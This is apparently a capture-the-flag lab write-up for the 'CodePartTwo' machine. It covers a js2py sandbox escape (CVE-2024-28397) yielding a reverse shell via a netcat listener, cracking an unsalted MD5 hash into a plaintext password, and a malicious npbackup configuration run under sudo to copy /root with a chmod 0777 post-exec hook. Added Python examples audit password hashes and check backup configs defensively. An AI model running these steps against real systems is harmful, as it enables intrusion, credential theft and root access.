
CodePartTwo

Discovered Ports

22/tcp   Open  SSH
8000/tcp Open  HTTP (Python app)

Enumeration

Port 8000 hosts a Python-based web application. Its form presents a sandbox that executes submitted code; although the application itself is written in Python, the submitted code is evaluated by js2py, a JavaScript interpreter implemented in Python.


Exploitation: CVE-2024-28397 – js2py Sandbox Escape

The sandbox is vulnerable to CVE-2024-28397, a sandbox escape vulnerability that allows arbitrary code execution on the server.

PoC references: listed under Resources at the end.

Exploit

# On attacker machine
nc -nlvp 4444

# On attacker machine: launch exploit
cd /home/h0lm/Tools/js2py-Sandbox-Escape-CVE-2024-28397-RCE
bash exploit.sh

# Parameters entered
Target URL: http://10.10.11.82:8000/run_code
Your IP: 10.10.14.36
Your Port: 4444

Result: reverse shell as user app.


Initial Access – user app

While exploring /home/app/app/instance/users.db, we find a SQLite database containing user accounts and password hashes:

strings instance/users.db

Interesting extract:

CREATE TABLE user (
    id INTEGER NOT NULL,
    username VARCHAR(80) NOT NULL,
    password_hash VARCHAR(128) NOT NULL,
    PRIMARY KEY (id),
    UNIQUE (username)
)
marco
97588c0e2fa3a024876339e27aeb42e
649c9d65a206a75f5abe509fe128bce5

Hash Cracking

Using CrackStation:

Hash                               Type      Result
649c9d65a206a75f5abe509fe128bce5   MD5       sweetangelbabylove
97588c0e2fa3a024876339e27aeb42e    Unknown   Not found

Recovered credentials:

marco : sweetangelbabylove
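The application stored a bare, unsalted MD5 digest, which is why a single lookup recovered marco's password. The following Python is an added example, not code from the writeup or from the target application: it rebuilds the users.db schema shown above in memory, labels each stored value by format (the 31-character string from the extract is flagged because it is not even a full digest), and shows the standard fix of re-hashing legacy rows with salted PBKDF2-HMAC-SHA256 at the next successful login. The pairing of the two hash strings with usernames, the second username and the iteration count are assumptions.

```python
import hashlib
import hmac
import os
import re
import sqlite3

# Table definition copied from the writeup's users.db. The rows are
# constructed samples: the hash strings are the two values the `strings`
# extract printed, but their pairing with usernames is assumed.
SCHEMA = """
CREATE TABLE user (
    id INTEGER NOT NULL,
    username VARCHAR(80) NOT NULL,
    password_hash VARCHAR(128) NOT NULL,
    PRIMARY KEY (id),
    UNIQUE (username)
)
"""
SAMPLE_ROWS = [
    (1, "marco", "649c9d65a206a75f5abe509fe128bce5"),         # 32 hex chars: raw MD5 shape
    (2, "second_user", "97588c0e2fa3a024876339e27aeb42e"),    # 31 chars: not a full digest
]

PBKDF2_ITERATIONS = 600_000  # assumption: a current PBKDF2-HMAC-SHA256 work factor


def legacy_md5(password: str) -> str:
    """The unsalted scheme the application used; kept only to verify old rows."""
    return hashlib.md5(password.encode()).hexdigest()


def classify_hash(stored: str) -> str:
    """Label a stored value by format: the self-describing PBKDF2 string,
    a bare 32-hex-char string (treated as unsalted MD5), or something else."""
    if stored.startswith("pbkdf2_sha256$"):
        return "pbkdf2_sha256"
    if re.fullmatch(r"[0-9a-f]{32}", stored):
        return "unsalted_md5"
    return "unrecognised"


def hash_password(password: str, iterations: int = PBKDF2_ITERATIONS) -> str:
    """Salted, iterated hash stored as algo$iterations$salt$derived_key."""
    salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def verify_password(password: str, stored: str) -> bool:
    """Accept both formats so legacy rows can be upgraded lazily at login."""
    kind = classify_hash(stored)
    if kind == "pbkdf2_sha256":
        _, iterations, salt_hex, dk_hex = stored.split("$")
        dk = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                 bytes.fromhex(salt_hex), int(iterations))
        return hmac.compare_digest(dk.hex(), dk_hex)
    if kind == "unsalted_md5":
        return hmac.compare_digest(legacy_md5(password), stored)
    return False


def open_sample_db() -> sqlite3.Connection:
    """In-memory database with the writeup's schema and the sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute(SCHEMA)
    conn.executemany("INSERT INTO user VALUES (?, ?, ?)", SAMPLE_ROWS)
    conn.commit()
    return conn


def audit(conn: sqlite3.Connection) -> dict:
    """Map each username to the format of its stored hash; anything that is
    not pbkdf2_sha256 still needs migrating."""
    rows = conn.execute("SELECT username, password_hash FROM user").fetchall()
    return {user: classify_hash(h) for user, h in rows}


def login_and_migrate(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Check a login and, if the row still holds unsalted MD5, rewrite it as
    PBKDF2 now that the plaintext is available."""
    row = conn.execute("SELECT password_hash FROM user WHERE username = ?",
                       (username,)).fetchone()
    if row is None or not verify_password(password, row[0]):
        return False
    if classify_hash(row[0]) == "unsalted_md5":
        conn.execute("UPDATE user SET password_hash = ? WHERE username = ?",
                     (hash_password(password), username))
        conn.commit()
    return True


if __name__ == "__main__":
    db = open_sample_db()
    for user, kind in audit(db).items():
        print(f"{user}: {kind}")
```

Running the audit against a real copy of the database lists every account that is still on the legacy scheme; the lazy migration in login_and_migrate then converts rows as users authenticate, and the remaining legacy rows can be expired with a forced password reset.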

SSH Access

ssh marco@10.10.11.82

This gives the first flag, user.txt.


Privilege Escalation – npbackup

User marco belongs to the npbackup group, which grants access to the backup tool /usr/local/bin/npbackup-cli.

Because the tool runs under sudo and accepts an arbitrary configuration file, the idea is to supply a configuration that backs up /root into a repository that marco can read.

Create a Restic Repository

# same path and password as repo_uri / repo_password in the configuration below
restic init --repo /tmp/exploit-repo2

Malicious Configuration /tmp/npbackup2.conf

conf_version: 3.0.1
audience: public

repos:
  default:
    repo_uri: "local:///tmp/exploit-repo2"
    repo_group: default_group
    backup_opts:
      source_type: folder_list
      paths:
        - /root
      post_exec_commands:
        - "chmod -R 0777 /tmp/exploit-repo2"
      post_exec_per_command_timeout: 60
      post_exec_failure_is_fatal: false
    repo_opts:
      repo_password: "test"
    is_protected: false

groups:
  default_group:
    backup_opts:
      compression: auto
      use_fs_snapshot: true
      one_file_system: false
    repo_opts:
      retention_policy: {}
    is_protected: false

identity:
  machine_id: ${HOSTNAME}__blw0
  machine_group:

global_options:
  auto_upgrade: false

Run the Backup with sudo

sudo /usr/local/bin/npbackup-cli -b -c /tmp/npbackup2.conf

The /root directory is backed up into /tmp/exploit-repo2 with permissive permissions.
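The root cause here is that a member of the npbackup group may run the backup tool under sudo with any configuration file, so the caller decides what gets read, where it is written and which shell hooks run as root. The Python below is an added example, not part of the writeup or of npbackup: it is the policy check a privileged wrapper would apply to a parsed configuration before running the backup, and it rejects the writeup's /tmp/npbackup2.conf on three counts (source path outside the allowed roots, repository outside the allowed directory, a post-exec shell hook). The allowed roots, the SAFE_CONFIG contents and the trimmed-down dict form of the config are assumptions; the YAML is shown already parsed so the example needs no third-party parser.

```python
import posixpath
from pathlib import PurePosixPath
from urllib.parse import urlparse

# Assumed site policy (illustrative values, not from the writeup): where a
# backup job may read from and where it may write its repository.
ALLOWED_SOURCE_ROOTS = ("/home/app", "/var/www")
ALLOWED_REPO_ROOT = "/var/backups/repos"

# The writeup's /tmp/npbackup2.conf as Python structures (YAML already parsed).
# Only the keys the check reads are kept.
WRITEUP_CONFIG = {
    "repos": {
        "default": {
            "repo_uri": "local:///tmp/exploit-repo2",
            "backup_opts": {
                "source_type": "folder_list",
                "paths": ["/root"],
                "post_exec_commands": ["chmod -R 0777 /tmp/exploit-repo2"],
            },
            "repo_opts": {"repo_password": "test"},
        }
    },
    "groups": {"default_group": {"backup_opts": {"compression": "auto"}}},
}

# Constructed: what an administrator-controlled configuration for the same
# host might look like, with sources and repository inside the policy and no hooks.
SAFE_CONFIG = {
    "repos": {
        "default": {
            "repo_uri": "local:///var/backups/repos/app",
            "backup_opts": {"source_type": "folder_list",
                            "paths": ["/home/app/app/instance"]},
        }
    },
    "groups": {},
}


def under_allowed_root(path: str, roots) -> bool:
    """True if the normalised path is one of the roots or inside one of them;
    normalising first defeats '/home/app/../../root' style entries."""
    p = PurePosixPath(posixpath.normpath(path))
    return any(p.is_relative_to(r) for r in roots)


def check_backup_opts(label: str, opts: dict, allowed_sources) -> list:
    """Policy findings for one backup_opts mapping (repo- or group-level)."""
    findings = []
    for path in opts.get("paths", []):
        if not under_allowed_root(path, allowed_sources):
            findings.append(f"{label}: source path {path!r} is outside the allowed roots")
    for key, value in opts.items():
        # Any *_exec_commands list is a shell hook that runs with the
        # privileges of whoever invoked the tool (root under sudo).
        if key.endswith("_exec_commands") and value:
            findings.append(f"{label}: {key} would run {value!r} as the invoking user")
    return findings


def check_backup_config(cfg: dict, allowed_sources=ALLOWED_SOURCE_ROOTS,
                        allowed_repo_root=ALLOWED_REPO_ROOT) -> list:
    """Return the policy violations in a parsed npbackup-style config; an empty
    list means the config may be handed to the privileged backup run."""
    findings = []
    for name, repo in cfg.get("repos", {}).items():
        uri = urlparse(repo.get("repo_uri", ""))
        if uri.scheme != "local":
            findings.append(f"repo {name}: only local repositories are allowed, "
                            f"got {repo.get('repo_uri')!r}")
        elif not under_allowed_root(uri.path, [allowed_repo_root]):
            findings.append(f"repo {name}: repository path {uri.path!r} "
                            f"is outside {allowed_repo_root}")
        findings += check_backup_opts(f"repo {name}", repo.get("backup_opts", {}),
                                      allowed_sources)
    for name, group in cfg.get("groups", {}).items():
        findings += check_backup_opts(f"group {name}", group.get("backup_opts", {}),
                                      allowed_sources)
    return findings


if __name__ == "__main__":
    for line in check_backup_config(WRITEUP_CONFIG) or ["no findings"]:
        print(line)
    print("safe config:", check_backup_config(SAFE_CONFIG))
```

The simpler fix is to not let the sudo rule take a `-c` argument at all and to hard-code a root-owned configuration in the wrapper; the check above is for the case where operators still need to supply per-job configurations and the wrapper must decide whether a given file is acceptable before running as root.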


Reading the Backup Contents

restic -r /tmp/exploit-repo2 ls latest /root
mkdir -p /tmp/exploit-mnt
restic -r /tmp/exploit-repo2 mount /tmp/exploit-mnt

From /tmp/exploit-mnt, we can access /root files, including the root flag.


Summary

Step                    Description
Enumeration             Discovered vulnerable JS sandbox
Initial Exploit         CVE-2024-28397 → reverse shell as app
Credential Harvesting   Recovered MD5 hash → SSH as marco
Privilege Escalation    Abused npbackup + restic to read /root
Flags                   user.txt / root.txt

Resources

  • CVE-2024-28397 PoC
  • Restic Documentation
  • npbackup-cli (tool used for privilege escalation)